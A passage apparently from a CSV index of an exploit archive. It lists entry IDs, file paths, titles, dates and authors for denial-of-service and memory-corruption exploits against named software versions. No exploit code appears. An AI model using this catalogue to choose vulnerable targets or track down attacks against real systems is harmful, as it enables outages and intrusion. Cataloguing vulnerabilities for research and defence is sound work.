-16042,exploits/windows/dos/16042.rb,"Opera Web Browser 11.00 - Integer Overflow",2011-01-25,"C4SS!0 G0M3S",windows,dos, -16064,exploits/bsd/dos/16064.c,"FreeBSD 8.0 - Local Forced Reboot (Denial of Service)",2011-01-28,kingcope,bsd,dos, -16068,exploits/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices - Denial of Service",2011-01-28,"pawel gawinek",hardware,dos, -16079,exploits/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos, -16084,exploits/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos, -16095,exploits/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos, -16108,exploits/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos, -16120,exploits/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos, -16121,exploits/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos, -16129,exploits/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos, -16166,exploits/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos, -16150,exploits/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos, -16180,exploits/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos, -16182,exploits/linux/dos/16182.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos, -16193,exploits/windows/dos/16193.pl,"Avira AntiVir - '.QUA' File 'avcenter.exe' Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos, -16204,exploits/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,windows,dos, -16190,exploits/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos, -16191,exploits/windows/dos/16191.pl,"Novell ZenWorks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos, -16192,exploits/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos, -16254,exploits/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,windows,dos, -16203,exploits/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,windows,dos, -16216,exploits/linux/dos/16216.txt,"RedHat Linux - Stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos, -16230,exploits/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos, -16234,exploits/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos, -16237,exploits/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH)",2011-02-24,badc0re,windows,dos, -16248,exploits/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos, -16255,exploits/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos, -16260,exploits/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos, -16261,exploits/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Remote Denial of Service",2011-02-28,"_ikki & paradoxengine",multiple,dos, -16262,exploits/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos, -16263,exploits/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos, -16270,exploits/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos, -16284,exploits/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos, -16365,exploits/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos, -41793,exploits/multiple/dos/41793.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos, -16657,exploits/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos, -41798,exploits/macos/dos/41798.c,"Apple macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos, -16790,exploits/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 -16929,exploits/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos, -16939,exploits/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos, -16943,exploits/windows/dos/16943.pl,"Movavi VideoSuite 8.0 Slideshow - '.jpg' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos, -16944,exploits/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - '.avi' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos, -16945,exploits/hardware/dos/16945.pl,"Nokia N97 - '.m3u' Playlist Crash (PoC)",2011-03-08,KedAns-Dz,hardware,dos, -16952,exploits/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,linux,dos, -16960,exploits/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos, -16966,exploits/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",linux,dos, -16973,exploits/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,linux,dos, -16979,exploits/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,windows,dos, -16986,exploits/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,windows,dos, -16996,exploits/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",windows,dos, -17004,exploits/linux/dos/17004.txt,"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",linux,dos, -17019,exploits/windows/dos/17019.txt,"RealPlayer 14.0.1.633 - Heap Overflow",2011-03-21,"Luigi Auriemma",windows,dos, -17020,exploits/netware/dos/17020.py,"Novell Netware - NWFTPD.NLM DELE Remote Code Execution",2011-03-21,"Francis Provencher",netware,dos, -17021,exploits/windows/dos/17021.py,"SpoonFTP 1.2 - RETR Denial of Service",2011-03-21,"C4SS!0 G0M3S",windows,dos, -17023,exploits/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos, -17025,exploits/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos, -17032,exploits/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos, -17033,exploits/windows/dos/17033.py,"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities",2011-03-23,"Jeremy Brown",windows,dos, -17045,exploits/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - Denial of Service",2011-03-24,"Craig Freyman",windows,dos,69 -17070,exploits/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",windows,dos, -17071,exploits/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos, -17072,exploits/windows/dos/17072.py,"Microsoft Windows Explorer 6.0.2900.5512 - 'Shmedia.dll 6.0.2900.5512' AVI Preview Denial of Service (PoC)",2011-03-29,BraniX,windows,dos, -17074,exploits/windows/dos/17074.py,"Winamp 5.61 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos, -17075,exploits/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - '.avi' Denial of Service (PoC)",2011-03-30,BraniX,windows,dos, -17145,exploits/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos, -17087,exploits/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos, -17089,exploits/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos, -17097,exploits/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated Kernel Memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos, -17120,exploits/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos, -17133,exploits/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos, -17140,exploits/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos, -17142,exploits/windows/dos/17142.py,"IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos, -17143,exploits/windows/dos/17143.py,"IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos, -17159,exploits/windows/dos/17159.txt,"Microsoft Host Integration Server 8.5.4224.0 - Denial of Service",2011-04-12,"Luigi Auriemma",windows,dos, -17160,exploits/windows/dos/17160.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos, -17161,exploits/windows/dos/17161.txt,"Microsoft Reader 2.1.1.3143 - Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos, -17162,exploits/windows/dos/17162.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",windows,dos, -17163,exploits/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos, -17164,exploits/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",windows,dos, -17188,exploits/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos, -17201,exploits/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos, -17222,exploits/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos, -17227,exploits/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,windows,dos, -17266,exploits/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos, -17278,exploits/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,windows,dos, -17273,exploits/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences",2011-05-12,"Stefan LE BERRE",windows,dos, -17274,exploits/windows/dos/17274.txt,"SlimPDF Reader - Denial of Service (PoC)",2011-05-12,"Nicolas Krassas",windows,dos, -17287,exploits/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos, -17291,exploits/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos, -17298,exploits/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,netware,dos, -17305,exploits/windows/dos/17305.py,"Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos, -17351,exploits/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos, -17353,exploits/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos, -18716,exploits/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos, -17363,exploits/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos, -17372,exploits/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow",2011-06-08,TecR0c,windows,dos, -17455,exploits/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos, -17387,exploits/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos, -17396,exploits/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos, -17398,exploits/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos, -17399,exploits/windows/dos/17399.txt,"Microsoft Office XP - Remote code Execution",2011-06-14,"Francis Provencher",windows,dos, -17400,exploits/linux/dos/17400.c,"Conky Linux 1.8.0 - Local Denial of Service (PoC)",2011-06-14,"Arturo D'Elia",linux,dos, -17401,exploits/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service (MS11-047)",2011-06-14,"Core Security",windows,dos, -17405,exploits/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 - Denial of Service",2011-06-16,"Soroush Dalili",windows,dos, -17421,exploits/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos, -17458,exploits/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos, -17461,exploits/windows/dos/17461.txt,"HP Data Protector 6.20 - EXEC_CMD Buffer Overflow",2011-06-30,"Core Security",windows,dos, -17463,exploits/linux/dos/17463.pl,"Rhythmbox - '.m3u' Local Crash (PoC)",2011-06-30,Caddy-Dz,linux,dos, -17471,exploits/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service",2011-07-03,X-h4ck,windows,dos, -17476,exploits/windows/dos/17476.rb,"Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos, -17509,exploits/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption",2011-07-08,"C4SS!0 G0M3S",windows,dos, -17497,exploits/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow",2011-07-06,LiquidWorm,windows,dos, -17501,exploits/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service (PoC)",2011-07-07,"Li'el Fridman",hardware,dos, -17512,exploits/windows/dos/17512.pl,"ZipItFast 3.0 - '.zip' Heap Overflow",2011-07-08,"C4SS!0 G0M3S",windows,dos, -17544,exploits/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos, -17549,exploits/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,anonymous,multiple,dos, -17567,exploits/osx/dos/17567.txt,"Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",osx,dos, -17569,exploits/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",windows,dos, -17580,exploits/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos, -17582,exploits/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos, -17583,exploits/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",windows,dos, -17601,exploits/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",windows,dos, -17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",multiple,dos, -17618,exploits/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server 'Write Command' Denial of Service",2011-08-05,"SecPod Research",windows,dos, -17620,exploits/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos, -17638,exploits/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos, -17642,exploits/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos, -17643,exploits/windows/dos/17643.pl,"Excel - SLYK Format Parsing Buffer Overrun (PoC)",2011-08-09,webDEViL,windows,dos, -17658,exploits/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive",2011-08-12,G13,windows,dos, -17664,exploits/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos, -17676,exploits/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,windows,dos, -17696,exploits/multiple/dos/17696.pl,"Apache - Remote Memory Exhaustion (Denial of Service)",2011-08-19,kingcope,multiple,dos, -17712,exploits/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos, -17718,exploits/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos, -17742,exploits/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos, -42604,exploits/multiple/dos/42604.html,"IBM Notes 8.5.x/9.0.x - Denial of Service (2)",2017-08-31,"Dhiraj Mishra",multiple,dos, -17769,exploits/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos, -17772,exploits/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos, -17781,exploits/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos, -17785,exploits/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service 'TOWeb.MO' File Corruption",2011-09-05,"BSOD Digital",windows,dos, -17795,exploits/windows/dos/17795.py,"Crush FTP 5 - 'APPE' Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",windows,dos, -17796,exploits/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos, -21788,exploits/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos, -17806,exploits/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos, -17815,exploits/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos, -21785,exploits/windows/dos/21785.pl,"HCView - WriteAV Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos, -17830,exploits/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)",2011-09-13,"Luigi Auriemma",windows,dos, -17831,exploits/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)",2011-09-13,"Core Security",windows,dos, -17835,exploits/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos, -17836,exploits/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",windows,dos, -17837,exploits/windows/dos/17837.txt,"eSignal and eSignal Pro 10.6.2425.1208 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos, -17838,exploits/windows/dos/17838.txt,"Cogent DataHub 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos, -17839,exploits/windows/dos/17839.txt,"Cogent DataHub 7.1.1.63 - Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos, -17841,exploits/windows/dos/17841.txt,"DaqFactory 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos, -17842,exploits/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos, -17843,exploits/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos, -17844,exploits/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos, -17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (PoC)",2011-09-18,loneferret,windows,dos,21 -17878,exploits/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos, -17879,exploits/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos, -17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos, -17889,exploits/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos, -17890,exploits/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,windows,dos, -17896,exploits/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos, -17901,exploits/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service)",2011-09-28,hkpco,osx,dos, -17903,exploits/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos, -17908,exploits/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow (PoC)",2011-09-30,"Shaun Colley",freebsd,dos, -17918,exploits/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos, -17928,exploits/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow",2011-10-04,LiquidWorm,windows,dos, -17929,exploits/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos, -17930,exploits/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos, -17931,exploits/windows/dos/17931.txt,"GenStat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos, -17933,exploits/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow (PoC)",2011-10-05,Snake,windows,dos, -17963,exploits/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos, -17964,exploits/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos, -17965,exploits/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos, -17978,exploits/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos, -17981,exploits/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos, -17982,exploits/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos, -18006,exploits/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,windows,dos, -18007,exploits/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows",2011-10-20,rgod,windows,dos, -18008,exploits/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos, -18011,exploits/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos, -18014,exploits/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",windows,dos, -18017,exploits/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - 'CEPMServer.exe' Denial of Service (PoC)",2011-10-21,loneferret,windows,dos, -18019,exploits/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos, -18023,exploits/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos, -18024,exploits/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)",2011-10-23,KiDebug,windows,dos, -18025,exploits/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos, -18043,exploits/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos, -40298,exploits/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 -18028,exploits/windows/dos/18028.py,"zFTPServer - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos, -18029,exploits/windows/dos/18029.pl,"BlueZone - '.zft' File Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos, -18030,exploits/windows/dos/18030.pl,"BlueZone Desktop - Multiple Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos, -18049,exploits/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos, -18052,exploits/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos, -18078,exploits/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",windows,dos, -18106,exploits/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos, -18107,exploits/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos, -18119,exploits/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",windows,dos, -18120,exploits/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,linux,dos,80 -18112,exploits/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos, -18116,exploits/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos, -18124,exploits/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos, -18140,exploits/windows/dos/18140.c,"Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos, -18159,exploits/linux/dos/18159.py,"XChat 2.8.9 - Heap Overflow 